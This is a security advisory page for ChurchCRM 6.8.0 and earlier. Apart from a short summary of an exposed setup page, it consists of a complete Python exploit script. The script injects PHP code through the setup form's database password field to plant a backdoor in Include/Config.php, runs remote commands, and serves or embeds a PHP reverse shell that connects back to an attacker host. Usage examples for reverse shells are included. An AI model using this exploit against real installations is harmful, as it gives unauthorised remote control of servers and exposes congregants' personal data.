Description
ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters. This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations.
Basic Information
ID
PACKETSTORM:215793
Published
Feb 18, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : ChurchCRM ≤ 6.8.0 – Setup Page Security Misconfiguration |
| # Author : indoushka |
| # Tested on : Windows 11 Pro (French) / Browser: Mozilla Firefox 147.0.3 (64-bit) |
| # Vendor : https://github.com/ChurchCRM/ |
=============================================================================================================================================
[+] Summary : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions.
If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters.
This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations.
Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version.
[+] POC :
#!/usr/bin/env python3
import argparse
import base64
import random
import string
import sys
import time
import logging
import re
import socket
import threading
import http.server
import socketserver
from urllib.parse import urljoin, urlparse, quote
from typing import Optional, Dict, Any, Tuple, List, Union
from dataclasses import dataclass, field
from enum import Enum
from functools import wraps
import json
import requests
from requests.exceptions import RequestException
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
VERSION = "2.0.0"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
TIMEOUT = 30
MAX_RETRIES = 3
DEFAULT_PATHS = ['', '/churchcrm', '/crm', '/church', '/crmchurch']
class ExploitError(Exception):
    """Common ancestor of every error type declared by this script."""


class TargetUnreachableError(ExploitError):
    """Signals that the target is not reachable."""


class InjectionFailedError(ExploitError):
    """Signals that a payload could not be injected."""


class PayloadServerError(ExploitError):
    """Signals a problem with the payload server."""


class VersionDetectionError(ExploitError):
    """Signals a problem while detecting the version."""
class TargetType(Enum):
    """Closed set of target-type identifiers; each value is the name in snake_case."""

    LINUX_CMD_STAGER = "linux_cmd_stager"
    PHP_MEMORY = "php_memory"
    PHP_FETCH = "php_fetch"
class CheckCode(Enum):
    """Possible outcomes reported by a vulnerability check."""

    SAFE = "safe"
    VULNERABLE = "vulnerable"
    UNKNOWN = "unknown"
    UNREACHABLE = "unreachable"
@dataclass
class TargetInfo:
    """Record describing one target URL and what has been learned about it."""

    # Components of the URL; the first five fields are required.
    url: str
    base_path: str
    scheme: str
    host: str
    port: int

    # Findings that are unknown until filled in later.
    version: Optional[str] = None
    vulnerable: Optional[bool] = None

    # A fresh list per instance (default_factory), never shared between records.
    detected_paths: List[str] = field(default_factory=list)
@dataclass
class ExploitResult:
    """Outcome record returned to the caller after a run."""

    # Only `success` is mandatory; everything else has a neutral default.
    success: bool
    session: Optional[requests.Session] = None
    message: str = ""
    target: Optional[TargetInfo] = None
    output: Optional[str] = None
class Version:
    """Parse and compare dotted version strings such as ``6.8.0`` or ``6.8.0-RC1``.

    Attributes:
        original: The string passed to the constructor, unchanged.
        clean: The first ``N.N`` or ``N.N.N`` run found in ``original``
            (``'0.0.0'`` when there is none).
        parts: ``clean`` split on dots and converted to integers.
        suffix: Trailing label without its ``-``/``_`` separator
            (``'beta2'`` for ``'1.0-beta2'``), or ``''`` when absent.

    Ordering rules:
        * Numeric parts are compared left to right and missing parts count as
          zero, so ``6.8`` and ``6.8.0`` are the same version.
        * With equal numeric parts, a version that has a suffix sorts before
          the one without.
        * Two suffixed versions are ordered by label (case-insensitively) and
          then by the number that ends the label.

    A plain string on the other side of a comparison is parsed as a version.
    Any other operand type yields ``NotImplemented`` instead of raising.
    Equal ``Version`` instances hash equally.
    """

    def __init__(self, version_string: str):
        self.original = version_string
        self.clean = self._clean_version(version_string)
        self.parts = self._parse_parts(self.clean)
        self.suffix = self._extract_suffix(version_string)

    def _clean_version(self, version: str) -> str:
        """Return the first ``N.N[.N]`` run in *version*, or ``'0.0.0'``."""
        match = re.search(r'(\d+\.\d+(?:\.\d+)?)', version)
        return match.group(1) if match else '0.0.0'

    def _parse_parts(self, version: str) -> List[int]:
        """Split *version* on dots; non-numeric pieces become ``0``."""
        parts = []
        for part in version.split('.'):
            try:
                parts.append(int(part))
            except ValueError:
                parts.append(0)
        return parts

    def _extract_suffix(self, version: str) -> str:
        """Return a trailing label such as ``beta2`` or ``RC1``, or ``''``."""
        match = re.search(r'[-_]([a-zA-Z]+\d*)$', version)
        return match.group(1) if match else ''

    def _sort_key(self) -> Tuple[Tuple[int, ...], int, str, int]:
        """Build the tuple on which equality, ordering and hashing all agree."""
        numbers = list(self.parts)
        # Trailing zeros carry no information: 6.8 and 6.8.0 must compare equal.
        while numbers and numbers[-1] == 0:
            numbers.pop()
        if not self.suffix:
            # Flag 1 places the plain release after any suffixed build.
            return (tuple(numbers), 1, '', 0)
        label = self.suffix.rstrip('0123456789')
        counter = self.suffix[len(label):]
        return (tuple(numbers), 0, label.lower(), int(counter) if counter else 0)

    @staticmethod
    def _coerce(other: object) -> Optional['Version']:
        """Return *other* as a ``Version``, or ``None`` if it is not comparable."""
        if isinstance(other, Version):
            return other
        if isinstance(other, str):
            return Version(other)
        return None

    def __lt__(self, other: Union[str, 'Version']) -> bool:
        """Less than comparison"""
        other = self._coerce(other)
        if other is None:
            return NotImplemented
        return self._sort_key() < other._sort_key()

    def __le__(self, other: Union[str, 'Version']) -> bool:
        """Less than or equal"""
        other = self._coerce(other)
        if other is None:
            return NotImplemented
        return self._sort_key() <= other._sort_key()

    def __eq__(self, other: object) -> bool:
        """Equal comparison"""
        other = self._coerce(other)
        if other is None:
            return NotImplemented
        return self._sort_key() == other._sort_key()

    def __hash__(self) -> int:
        # Defining __eq__ alone would make instances unhashable.
        return hash(self._sort_key())

    def __str__(self) -> str:
        return self.original

    def __repr__(self) -> str:
        return f"Version('{self.original}')"
def safe_urljoin(base: str, path: str) -> str:
    """
    Append *path* to *base* without discarding the path already on *base*.

    Trailing slashes on *base* are dropped first. A *path* with a leading
    slash is appended to the scheme, host and path of *base*, so any query
    string or fragment on *base* is lost. Any other *path* is attached to
    the trimmed *base* with a single slash.

    Examples:
    >>> safe_urljoin('http://example.com/churchcrm', '/setup/')
    'http://example.com/churchcrm/setup/'
    >>> safe_urljoin('http://example.com/churchcrm/', 'setup/')
    'http://example.com/churchcrm/setup/'
    """
    trimmed = base.rstrip('/')

    # Relative form: plain concatenation with exactly one separator.
    if not path.startswith('/'):
        return trimmed + '/' + path.lstrip('/')

    # Rooted form: rebuild from the parsed components of the base.
    pieces = urlparse(trimmed)
    origin = pieces.scheme + '://' + pieces.netloc
    return origin + pieces.path.rstrip('/') + path
def normalize_url(url: str) -> str:
    """Return *url* with a scheme guaranteed and trailing slashes removed.

    Surrounding whitespace is stripped. ``http://`` is prepended unless the
    value already begins with ``http://`` or ``https://``. That check ignores
    letter case, so ``HTTPS://host`` is left alone rather than becoming
    ``http://HTTPS://host``. The spelling of an existing scheme is preserved.

    Args:
        url: Host name or URL, with or without a scheme.

    Returns:
        The normalized URL with no trailing ``/``.
    """
    url = url.strip()
    # URL schemes are case-insensitive, so compare on a lower-cased copy.
    if not url.lower().startswith(('http://', 'https://')):
        url = 'http://' + url
    return url.rstrip('/')
def parse_target(url: str) -> TargetInfo:
    """Normalize *url* and break it into the fields of a ``TargetInfo``.

    The base path has its trailing slash removed and falls back to ``/`` when
    empty. A port missing from the URL defaults to 443 for ``https`` and to 80
    otherwise.
    """
    normalized = normalize_url(url)
    pieces = urlparse(normalized)

    explicit_port = pieces.port
    if explicit_port:
        port = explicit_port
    elif pieces.scheme == 'https':
        port = 443
    else:
        port = 80

    return TargetInfo(
        url=normalized,
        base_path=pieces.path.rstrip('/') or '/',
        scheme=pieces.scheme,
        host=pieces.hostname,
        port=port,
    )
def discover_base_path(session: requests.Session, base_url: str,
paths: List[str] = None, logger: logging.Logger = None) -> Optional[str]:
"""
Discover the correct base path by trying common paths
"""
if paths is None:
paths = DEFAULT_PATHS
parsed = urlparse(base_url)
base = f"{parsed.scheme}://{parsed.netloc}"
for path in paths:
test_url = f"{base}{path}" if path else base
try:
setup_url = safe_urljoin(test_url, '/setup/')
if logger:
logger.debug(f"Trying path: {setup_url}")
response = session.get(setup_url, timeout=5, allow_redirects=False)
if response.status_code in [200, 301, 302]:
if logger:
logger.info(f"Found ChurchCRM at: {test_url}")
return test_url
except:
continue
return None
class ColoredFormatter(logging.Formatter):
    """Formatter that wraps the level name in an ANSI color sequence.

    The color is applied only while this formatter renders the record. The
    record's ``levelname`` is restored afterwards, so other handlers or
    filters that share the same ``LogRecord`` still see the plain name.
    """

    # ANSI escape sequences keyed by level name; 'RESET' ends the colored run.
    COLORS = {
        'DEBUG': '\033[36m',
        'INFO': '\033[32m',
        'WARNING': '\033[33m',
        'ERROR': '\033[31m',
        'CRITICAL': '\033[35m',
        'RESET': '\033[0m'
    }

    def format(self, record):
        """Return the formatted record with a colorized level name.

        Level names without an entry in ``COLORS`` are rendered unchanged.
        """
        plain = record.levelname
        color = self.COLORS.get(plain)
        if color is None:
            return super().format(record)

        record.levelname = f"{color}{plain}{self.COLORS['RESET']}"
        try:
            return super().format(record)
        finally:
            # Undo the change even if formatting raises.
            record.levelname = plain
def setup_logger(debug: bool = False) -> logging.Logger:
    """Return the script's named logger, attaching a stdout handler once.

    The level is set on every call (DEBUG when *debug* is true, INFO
    otherwise). The colored stdout handler is added only if the logger has no
    handlers yet, so repeated calls do not duplicate output.
    """
    log = logging.getLogger('churchcrm_exploit')
    level = logging.DEBUG if debug else logging.INFO
    log.setLevel(level)

    # Already configured by an earlier call: nothing more to attach.
    if log.handlers:
        return log

    stream = logging.StreamHandler(sys.stdout)
    stream.setFormatter(
        ColoredFormatter(
            '%(asctime)s [%(levelname)s] %(message)s',
            datefmt='%H:%M:%S'
        )
    )
    log.addHandler(stream)
    return log
def create_session(retries: int = MAX_RETRIES) -> requests.Session:
"""Create requests session with retry logic"""
session = requests.Session()
retry_strategy = Retry(
total=retries,
backoff_factor=0.5,
status_forcelist=[500, 502, 503, 504],
allowed_methods=["HEAD", "GET", "OPTIONS", "POST"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)
session.headers.update({
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
})
return session
def random_string(length: int = 8) -> str:
    """Return *length* lowercase ASCII letters drawn with ``random.choices``."""
    letters = random.choices(string.ascii_lowercase, k=length)
    return ''.join(letters)
def random_int_string(min_len: int = 5, max_len: int = 10) -> str:
    """Return a string of decimal digits whose length lies in [min_len, max_len]."""
    digit_count = random.randint(min_len, max_len)
    digits = random.choices(string.digits, k=digit_count)
    return ''.join(digits)
def random_url() -> str:
    """Return ``http://<8 random lowercase letters>.com/``."""
    label = random_string(8)
    return "http://" + label + ".com/"
class PayloadHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP handler for serving payloads"""
payload = None
logger = None
request_count = 0
def do_GET(self):
"""Handle GET request"""
PayloadHandler.request_count += 1
if self.logger:
self.logger.debug(f"Payload request #{PayloadHandler.request_count} from {self.client_address[0]}")
if self.payload:
self.send_response(200)
self.send_header('Content-Type', 'application/x-httpd-php')
self.send_header('Content-Length', str(len(self.payload)))
self.send_header('Pragma', 'no-cache')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.end_headers()
self.wfile.write(self.payload.encode())
if self.logger:
self.logger.info(f"Served payload to {self.client_address[0]}")
else:
self.send_response(404)
self.end_headers()
def log_message(self, format, *args):
"""Override to use our logger"""
if self.logger and self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(f"Payload server: {format % args}")
class PayloadServer:
"""HTTP server for serving payloads"""
def __init__(self, logger: logging.Logger, host: str = '0.0.0.0', port: int = 0):
self.logger = logger
self.host = host
self.port = port
self.server = None
self.thread = None
self.payload = None
def start(self, payload: str) -> str:
"""Start payload server and return URL"""
self.payload = payload
PayloadHandler.payload = payload
PayloadHandler.logger = self.logger
PayloadHandler.request_count = 0
self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False)
self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.server_bind()
self.server.server_activate()
self.port = self.server.server_address[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
server_url = f"http://{self.get_local_ip()}:{self.port}/"
self.logger.info(f"Payload server started at {server_url}")
return server_url
def stop(self):
"""Stop payload server"""
if self.server:
self.server.shutdown()
self.server.server_close()
self.logger.debug(f"Payload server stopped (served {PayloadHandler.request_count} requests)")
def get_local_ip(self) -> str:
"""Get local IP address"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
return ip
def wait_for_requests(self, timeout: int = 10) -> bool:
"""Wait for at least one request"""
start = time.time()
while time.time() - start < timeout:
if PayloadHandler.request_count > 0:
return True
time.sleep(0.5)
return False
class VersionDetector:
"""Detect ChurchCRM version from response"""
def __init__(self, logger: logging.Logger):
self.logger = logger
self.patterns = [
(re.compile(r'CRM-VERSION:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'header'),
(re.compile(r'<meta[^>]*name=["\']version["\'][^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'meta'),
(re.compile(r'<meta[^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)[^>]*name=["\']version', re.I), 'meta'),
(re.compile(r'<!--\s*ChurchCRM[^\d]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'comment'),
(re.compile(r'ChurchCRM[^\d]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'footer'),
(re.compile(r'window\.ChurchCRM\s*=\s*\{[^}]*version:\s*["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'js'),
(re.compile(r'"softwareVersion"\s*:\s*"([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'json'),
(re.compile(r'ChurchCRM[\/\s-]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'php'),
]
def detect(self, response: requests.Response) -> Optional[Version]:
"""Detect version from response"""
detected_versions = []
if 'CRM-VERSION' in response.headers:
version = self._clean_version(response.headers['CRM-VERSION'])
if version:
self.logger.debug(f"Version found in header: {version}")
detected_versions.append(('header', version))
if 'X-Powered-By' in response.headers:
match = re.search(r'ChurchCRM[\/\s-]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)',
response.headers['X-Powered-By'], re.I)
if match:
version = self._clean_version(match.group(1))
if version:
self.logger.debug(f"Version found in X-Powered-By: {version}")
detected_versions.append(('x-powered', version))
for pattern, source in self.patterns:
matches = pattern.findall(response.text)
for match in matches:
if isinstance(match, tuple):
match = match[0]
version = self._clean_version(match)
if version:
self.logger.debug(f"Version found in {source}: {version}")
detected_versions.append((source, version))
if not detected_versions:
return None
version_counts = {}
for source, version in detected_versions:
version_str = str(version)
version_counts[version_str] = version_counts.get(version_str, 0) + 1
most_common = max(version_counts.items(), key=lambda x: x[1])
self.logger.debug(f"Most common version: {most_common[0]} (appears {most_common[1]} times)")
return Version(most_common[0])
def _clean_version(self, version: str) -> Optional[Version]:
"""Clean and validate version string"""
version = version.strip()
match = re.search(r'([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', version)
if match:
return Version(match.group(1))
return None
def is_vulnerable(self, version: Optional[Version]) -> Optional[bool]:
"""Check if version is vulnerable using enhanced comparison"""
if not version:
return None
try:
vulnerable = version <= '6.8.0'
self.logger.debug(f"Version {version} <= 6.8.0? {vulnerable}")
return vulnerable
except Exception as e:
self.logger.error(f"Version comparison error: {e}")
return None
class ChurchCRMExploit:
"""ChurchCRM RCE Exploit"""
def __init__(self, target_url: str, logger: logging.Logger,
target_type: TargetType = TargetType.LINUX_CMD_STAGER,
lhost: Optional[str] = None, lport: Optional[int] = None,
payload: Optional[str] = None, verify_ssl: bool = True,
proxy: Optional[str] = None, auto_discover: bool = True):
self.logger = logger
self.original_url = target_url
self.target_type = target_type
self.lhost = lhost
self.lport = lport
self.custom_payload = payload
self.verify_ssl = verify_ssl
self.proxy = proxy
self.auto_discover = auto_discover
self.session = create_session()
self.payload_server = None
self.version_detector = VersionDetector(logger)
self.backdoor_injected = False
if proxy:
self.session.proxies = {'http': proxy, 'https': proxy}
self.target = self._initialize_target(target_url)
def _initialize_target(self, target_url: str) -> TargetInfo:
"""Initialize target with optional path discovery"""
try:
info = parse_target(target_url)
test_url = safe_urljoin(info.url, '/setup/')
response = self.session.get(test_url, timeout=5, verify=self.verify_ssl, allow_redirects=False)
if response.status_code in [200, 301, 302]:
self.logger.info(f"Target URL working: {info.url}")
info.detected_paths.append(info.base_path)
return info
except:
pass
if self.auto_discover:
self.logger.info("Direct URL not working, attempting path discovery...")
discovered = discover_base_path(self.session, target_url, logger=self.logger)
if discovered:
info = parse_target(discovered)
info.detected_paths = DEFAULT_PATHS
self.logger.info(f"Discovered ChurchCRM at: {info.url}")
return info
return parse_target(target_url)
def check(self) -> Dict[str, Any]:
"""Check if target is vulnerable"""
self.logger.info(f"Checking target: {self.target.url}")
try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Accessing {url}")
response = self.session.get(
url,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=True
)
self.logger.debug(f"Response code: {response.status_code}")
if response.status_code not in [200, 301, 302]:
self.logger.warning(f"Unexpected response code: {response.status_code}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Setup page returned HTTP {response.status_code}'
}
version = self.version_detector.detect(response)
if version:
self.logger.info(f"Detected ChurchCRM version: {version}")
vulnerable = self.version_detector.is_vulnerable(version)
self.target.version = str(version)
self.target.vulnerable = vulnerable
if vulnerable:
self.logger.warning("Target appears VULNERABLE!")
return {
'code': CheckCode.VULNERABLE,
'version': str(version),
'message': f'Vulnerable version {version} detected'
}
else:
self.logger.info("Target appears NOT vulnerable")
return {
'code': CheckCode.SAFE,
'version': str(version),
'message': f'Version {version} is not vulnerable'
}
else:
self.logger.warning("Could not detect version")
return {
'code': CheckCode.UNKNOWN,
'message': 'Version unknown - setup page accessible'
}
except RequestException as e:
self.logger.error(f"Request failed: {e}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Target unreachable: {e}'
}
def build_payload(self) -> str:
"""Build payload based on target type"""
prefix = f"{random_string(3)}';"
if self.target_type == TargetType.PHP_MEMORY:
if self.custom_payload:
php_payload = self.custom_payload
else:
php_payload = self._generate_reverse_shell()
b64_payload = base64.b64encode(php_payload.encode()).decode()
return f"{prefix} eval(base64_decode(\"{b64_payload}\")); //"
elif self.target_type == TargetType.PHP_FETCH:
if not self.payload_server:
raise PayloadServerError("Payload server not started")
payload_name = f"/tmp/{random_string(8)}.php"
server_url = f"http://{self.lhost}:{self.payload_server.port}/"
return (f"{prefix} $f='{payload_name}'; "
f"file_put_contents($f, file_get_contents('{server_url}')); "
f"register_shutdown_function('unlink', $f); include($f); //")
else:
return f"{prefix} system($_GET['cmd']); //"
def _generate_reverse_shell(self) -> str:
"""Generate PHP reverse shell"""
if not self.lhost or not self.lport:
return "phpinfo();"
return f"""<?php
$lhost = '{self.lhost}';
$lport = {self.lport};
if (function_exists('fsockopen') && function_exists('proc_open')) {{
$sock = @fsockopen($lhost, $lport);
if ($sock) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
if (function_exists('socket_create') && function_exists('proc_open')) {{
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock && @socket_connect($sock, $lhost, $lport)) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
?>"""
def inject_backdoor(self) -> bool:
"""Inject backdoor via setup page"""
self.logger.info("Injecting backdoor into Include/Config.php...")
payload = self.build_payload()
post_data = {
'DB_SERVER_NAME': random_string(8),
'DB_SERVER_PORT': '3306',
'DB_NAME': random_string(8),
'DB_USER': random_string(6),
'DB_PASSWORD': payload,
'ROOT_PATH': '/',
'URL': random_url()
}
self.logger.debug(f"POST data prepared (password field contains payload)")
try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Sending POST to {url}")
response = self.session.post(
url,
data=post_data,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=False
)
if response.status_code == 200:
self.logger.info("Backdoor injected successfully!")
self.backdoor_injected = True
return True
else:
self.logger.error(f"Injection failed with HTTP {response.status_code}")
return False
except RequestException as e:
self.logger.error(f"Injection request failed: {e}")
return False
def execute_command(self, cmd: str) -> Optional[str]:
"""Execute command on target"""
if not self.backdoor_injected:
self.logger.warning("Backdoor not injected yet. Attempting injection...")
if not self.inject_backdoor():
self.logger.error("Cannot execute command: backdoor injection failed")
return None
self.logger.info(f"Executing command: {cmd}")
try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Command URL: {url}?cmd={quote(cmd)}")
response = self.session.get(
url,
params={'cmd': cmd},
timeout=TIMEOUT,
verify=self.verify_ssl
)
if response.status_code == 200:
output = response.text.strip()
if '<html' in output.lower():
body_match = re.search(r'<body[^>]*>(.*?)</body>', output, re.S | re.I)
if body_match:
output = body_match.group(1).strip()
output = re.sub(r'<[^>]+>', ' ', output)
output = re.sub(r'\s+', ' ', output).strip()
return output
else:
self.logger.error(f"Command execution failed with HTTP {response.status_code}")
return None
except RequestException as e:
self.logger.error(f"Command execution request failed: {e}")
return None
def cleanup(self) -> bool:
"""Clean up - remove backdoor"""
if not self.backdoor_injected:
self.logger.debug("No backdoor to clean up")
return True
self.logger.info("Cleaning up...")
commands = [
'rm -f Include/Config.php',
'rm Include/Config.php',
'rm -f churchcrm/Include/Config.php',
'del /f Include\\Config.php',
'php -r "unlink(\'Include/Config.php\');"',
'php -r "unlink(\'churchcrm/Include/Config.php\');"'
]
success = False
for cmd in commands:
result = self.execute_command(cmd)
if result is not None: # Command executed (even if file doesn't exist)
self.logger.debug(f"Cleanup command executed: {cmd}")
success = True
if success:
self.logger.info("Cleanup completed")
self.backdoor_injected = False
else:
self.logger.warning("Cleanup may have failed")
return success
def run_cmd_stager(self, cmd: str) -> Tuple[bool, Optional[str]]:
"""Run command stager"""
output = self.execute_command(cmd)
return (output is not None, output)
def run_php_memory(self) -> Tuple[bool, Optional[str]]:
"""Run PHP in-memory payload"""
self.logger.info("Executing PHP in-memory payload...")
try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Triggering payload via GET to {url}")
response = self.session.get(url, timeout=TIMEOUT, verify=self.verify_ssl)
if response.status_code == 200:
self.logger.info("PHP payload executed successfully")
return (True, response.text[:500] + "..." if len(response.text) > 500 else response.text)
else:
self.logger.error(f"PHP execution failed with HTTP {response.status_code}")
return (False, None)
except RequestException as e:
self.logger.error(f"PHP execution request failed: {e}")
return (False, None)
def run_php_fetch(self) -> Tuple[bool, Optional[str]]:
"""Run PHP fetch payload"""
self.logger.info("Executing PHP fetch payload...")
self.payload_server = PayloadServer(self.logger, host='0.0.0.0')
if self.custom_payload:
payload = self.custom_payload
else:
payload = self._generate_reverse_shell()
try:
server_url = self.payload_server.start(payload)
self.logger.info(f"Serving payload from {server_url}")
time.sleep(2)
if self.inject_backdoor():
self.logger.info("Waiting for payload request...")
if self.payload_server.wait_for_requests(timeout=30):
self.logger.info("Payload was fetched by target")
time.sleep(5)
success = True
else:
self.logger.warning("No payload request received")
success = False
else:
success = False
return (success, None)
finally:
self.payload_server.stop()
def exploit(self) -> ExploitResult:
"""Main exploit method"""
self.logger.info(f"Starting exploit against {self.target.url}")
self.logger.info(f"Target type: {self.target_type.value}")
check_result = self.check()
if check_result['code'] == CheckCode.UNREACHABLE:
return ExploitResult(
success=False,
message=f"Target unreachable: {check_result['message']}"
)
if check_result['code'] == CheckCode.SAFE:
return ExploitResult(
success=False,
message=check_result['message']
)
if not self.inject_backdoor():
return ExploitResult(
success=False,
message="Failed to inject backdoor"
)
success = False
output = None
if self.target_type == TargetType.LINUX_CMD_STAGER:
if self.custom_payload:
success, output = self.run_cmd_stager(self.custom_payload)
else:
success, output = self.run_cmd_stager('id')
if success and output:
self.logger.info(f"Command output: {output.strip()}")
elif self.target_type == TargetType.PHP_MEMORY:
success, output = self.run_php_memory()
elif self.target_type == TargetType.PHP_FETCH:
success, output = self.run_php_fetch()
self.cleanup()
return ExploitResult(
success=success,
message="Exploit completed successfully" if success else "Exploit failed",
target=self.target,
output=output
)
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description='ChurchCRM Unauthenticated RCE Exploit by indoushka',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check vulnerability
%(prog)s http://target.com/churchcrm --check
# Execute command
%(prog)s http://target.com --cmd "id"
# Reverse shell (Linux)
%(prog)s http://target.com --reverse 192.168.1.100 4444
# Reverse shell with PHP fetch method
%(prog)s http://target.com --type php-fetch --reverse 192.168.1.100 4444
# Custom PHP payload
%(prog)s http://target.com --payload "<?php phpinfo(); ?>"
# With proxy and debug
%(prog)s http://target.com --check --proxy http://127.0.0.1:8080 --debug
Exit codes:
0 - Not vulnerable / Success
1 - Error / Unknown
2 - Vulnerable
"""
)
parser.add_argument('target', help='Target URL (e.g., http://target.com/churchcrm)')
parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
parser.add_argument('--cmd', metavar='COMMAND', help='Execute command')
parser.add_argument('--reverse', nargs=2, metavar=('LHOST', 'LPORT'),
help='Reverse shell (LHOST LPORT)')
parser.add_argument('--payload', metavar='CODE', help='Custom PHP payload')
parser.add_argument('--payload-file', metavar='FILE', help='PHP payload file')
parser.add_argument('--type', choices=['linux', 'php-memory', 'php-fetch'],
default='linux', help='Target type (default: linux)')
parser.add_argument('--proxy', help='HTTP proxy (e.g., http://127.0.0.1:8080)')
parser.add_argument('--no-verify', action='store_true', help='Disable SSL verification')
parser.add_argument('--debug', action='store_true', help='Enable debug output')
parser.add_argument('--no-discover', action='store_true',
help='Disable automatic path discovery')
args = parser.parse_args()
logger = setup_logger(args.debug)
if not any([args.check, args.cmd, args.reverse, args.payload, args.payload_file]):
logger.error("No action specified. Use --help for usage.")
sys.exit(1)
target_type_map = {
'linux': TargetType.LINUX_CMD_STAGER,
'php-memory': TargetType.PHP_MEMORY,
'php-fetch': TargetType.PHP_FETCH
}
target_type = target_type_map[args.type]
payload = None
if args.payload:
payload = args.payload
elif args.payload_file:
try:
with open(args.payload_file, 'r') as f:
payload = f.read()
except Exception as e:
logger.error(f"Failed to read payload file: {e}")
sys.exit(1)
try:
exploit = ChurchCRMExploit(
target_url=args.target,
logger=logger,
target_type=target_type,
lhost=args.reverse[0] if args.reverse else None,
lport=int(args.reverse[1]) if args.reverse else None,
payload=payload,
verify_ssl=not args.no_verify,
proxy=args.proxy,
auto_discover=not args.no_discover
)
except Exception as e:
logger.error(f"Failed to initialize exploit: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)
try:
if args.check:
result = exploit.check()
if result['code'] == CheckCode.VULNERABLE:
logger.warning(f"Target is VULNERABLE! Version: {result.get('version', 'unknown')}")
sys.exit(2)
elif result['code'] == CheckCode.SAFE:
logger.info("Target is NOT vulnerable")
sys.exit(0)
else:
logger.warning(f"Unknown status: {result['message']}")
sys.exit(1)
elif args.cmd:
logger.info(f"Executing command: {args.cmd}")
if exploit.target_type != TargetType.LINUX_CMD_STAGER:
logger.warning(f"Switching target type from {exploit.target_type.value} to linux_cmd_stager")
exploit.target_type = TargetType.LINUX_CMD_STAGER
result = exploit.exploit()
if result.success and result.output:
print("\n" + "="*60)
print("COMMAND OUTPUT:")
print("="*60)
print(result.output)
print("="*60)
elif result.success:
print("\nCommand executed successfully (no output)")
else:
logger.error(f"Command execution failed: {result.message}")
sys.exit(1)
elif args.reverse:
logger.info(f"Attempting reverse shell to {args.reverse[0]}:{args.reverse[1]}")
if args.type == 'php-fetch':
exploit.target_type = TargetType.PHP_FETCH
elif args.type == 'php-memory':
exploit.target_type = TargetType.PHP_MEMORY
else:
exploit.target_type = TargetType.LINUX_CMD_STAGER
result = exploit.exploit()
if result.success:
logger.info("Reverse shell payload sent. Check your listener!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Reverse shell failed: {result.message}")
sys.exit(1)
else:
result = exploit.exploit()
if result.success:
logger.info("Exploit completed successfully!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Exploit failed: {result.message}")
sys.exit(1)
except KeyboardInterrupt:
logger.info("Interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == '__main__':
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================
